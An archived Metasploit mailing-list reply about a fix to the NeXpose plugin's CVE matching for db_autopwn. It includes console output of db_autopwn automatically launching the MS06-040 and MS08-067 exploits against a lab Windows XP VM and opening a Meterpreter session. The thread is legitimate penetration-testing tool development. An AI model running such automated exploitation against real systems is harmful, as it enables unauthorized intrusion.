Metasploit mailing list archives
Re: db_autopwn & NeXpose
From: John Sawyer <jsawyer () ufl edu>
Date: Thu, 3 Dec 2009 11:22:17 -0500
On Dec 2, 2009, at 8:36 PM, HD Moore wrote:
On Wed, 2009-12-02 at 16:28 -0500, John Sawyer wrote:Great work on the new updates. I took the NeXpose plugin for a testdrive today and everything seems to be working as expected except thatdb_autopwn is not mapping the CVE-2006-3439 vulnerability to the exploit for MS06-040. I have a VM with Windows XP SP2 that is definitely vulnerable. I confirmed it is vulnerable by exploiting it. Is there something I'm missing or is there a CVE name mismatch when PWN_XREF does the lookup?All fixed, svn update :-) This update also improves db_autopwn usability quite a bit.
HD, you're the man! I saw you made multiple changes (nexpose.rb & db.rb) since your e-mail last night and this morning. Around 1am, I got the first chunk of output below, and this morning after another update, I get even more accurate results.
I know I probably shouldn't use the autopwn at the end since it is trying both exploits, but it's there so I couldn't help myself. It worked without a problem. Very sweet!
Your turnaround time is amazing. Keep up the awesome work. -jhs msf > db_autopwn -t -x [*] Analysis completed in 3 seconds (3 vulns / 1761 refs)[*] = = = = = = = = ========================================================================
[*] Matching Exploit Modules[*] = = = = = = = = ======================================================================== [*] 172.16.1.163:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439) [*] = = = = = = = = ========================================================================
[*] [*] msf >db_autopwn -e -r -t -x [*] Analysis completed in 3 seconds (4 vulns / 1763 refs) [*][*] = = = = = = = = ========================================================================
[*] Matching Exploit Modules[*] = = = = = = = = ======================================================================== [*] 172.16.1.163:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439) [*] 172.16.1.163:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE- dcerpc-ms-netapi-netpathcanonicalize-dos) [*] = = = = = = = = ========================================================================
[*] [*][*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 172.16.1.163:445... [*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 172.16.1.163:445... [*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution... [*] Meterpreter session 1 opened (192.168.1.12:31783 -> 172.16.1.163:1036)
[*] The autopwn command has completed with 1 sessions [*] Enter sessions -i [ID] to interact with a given session ID [*][*] = = = = = = = = ========================================================================
Active sessions =============== Id Description Tunnel Via -- ----------- ------ ---1 Meterpreter 192.168.1.12:31783 -> 172.16.1.163:1036 windows/ smb/ms08_067_netapi
[*] = = = = = = = = ========================================================================
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- db_autopwn & NeXpose John Sawyer (Dec 02)
- Re: db_autopwn & NeXpose HD Moore (Dec 02)
- Re: db_autopwn & NeXpose HD Moore (Dec 02)
- Re: db_autopwn & NeXpose John Sawyer (Dec 03)